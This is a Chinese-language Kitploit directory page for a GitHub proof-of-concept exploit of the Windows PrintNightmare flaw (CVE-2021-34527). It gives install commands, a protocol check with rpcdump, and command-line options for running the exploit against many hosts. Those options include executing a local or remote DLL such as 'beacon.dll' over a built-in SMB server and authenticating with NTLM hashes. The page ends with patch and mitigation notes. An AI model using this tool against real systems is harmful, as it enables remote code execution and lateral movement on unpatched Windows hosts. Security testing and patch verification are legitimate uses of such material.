Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-34527 — PrintNightmare (CVE-2021-34527) PoC Exploit | Kitploit
工具/GitHubGitHub/m8sec/cve-2021-34527
Privilege EscalationPayload GenerationVulnerability AnalysisExploitationLateral MovementPenetration Testing
GitHubm8sec/cve-2021-34527

CVE-2021-34527

PrintNightmare (CVE-2021-34527) PoC Exploit

查看仓库
1181923年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

PrintNightmare(CVE-2021-34527)

本版本的PrintNightmare漏洞利用基于Cube0x0创建的代码,具有以下特点:

  • 能够针对多个主机。
  • 内置SMB服务器用于载荷投递,无需开放文件共享。
  • 利用包含MS-RPRN和MS-PAR两种协议(在CMD参数中定义)。
  • 实现了@gentilkiwi的UNC绕过技术。

安装

运行前,请安装最新版本的impacket:

root@kitploit:~
git clone https://github.com/SecureAuthCorp/impacket
cd impacket
python3 setup install

git clone https://github.com/m8sec/CVE-2021-34527
cd CVE-2021-34527
python3 CVE-2021-34527.py -h

测试

Impacket的rpcdump.py可用于检查MS-PAR和MS-RPRN协议:

root@kitploit:~
>> rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

或者,byt3bl33d3r的扫描器ItWasAllADream可用于扫描目标并验证PrintNightmare RCE漏洞。

截图

pnm

使用方法

root@kitploit:~
  -v VERBOSE            启用SMB服务器的详细日志记录
  -t TIMEOUT            连接超时

身份验证:
  -u USERNAME           设置用户名
  -H HASH, -hashes      使用NTLM哈希进行身份验证
  -p PASSWORD           设置密码
  -d DOMAIN             设置域名
  --local-auth          对目标主机进行本地身份验证(无域)

DLL执行:
  -dll DLL               要执行的本地DLL文件路径 "beacon.dll"
  --remote-dll REMOTE_DLL 远程DLL "\\192.168.1.25\Share\beacon.dll"
  -share SHARE            设置本地SMB共享名称
  --local-ip LOCAL_IP     设置本地IP(默认为主接口)

目标:
  -pDriverPath PDRIVERPATH  定义驱动程序路径。示例 'C:\Windows\System32\DriverStore\FileRepository\ntprint.inf_amd64_83aa9aebf5dffc96\Amd64\UNIDRV.DLL'
  -port [destination port]  连接到SMB服务器的目标端口
  -proto {MS-RPRN,MS-PAR}   目标协议(默认=MS-RPRN)
  target                    192.168.2.2, target.txt, 10.0.0.0/24(位置参数)

修复措施

微软已发布多个PrintNightmare补丁,最近一次是在2021年9月的补丁星期二。此补丁解决了底层漏洞及后来发现的变通方法。更多信息请访问微软官方指南:

https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

用于缓解此漏洞的附加策略包括:

  • 在非必要系统上禁用打印后台处理程序服务。
  • 通过组策略禁用入站远程打印

致谢

  • @cube0x0 - 感谢提供的Python漏洞利用代码以及对impacket项目的贡献。
  • @edwardzpeng与@lxf02942370- 感谢对PrintNightmare的初步发现和漏洞利用。
下载工具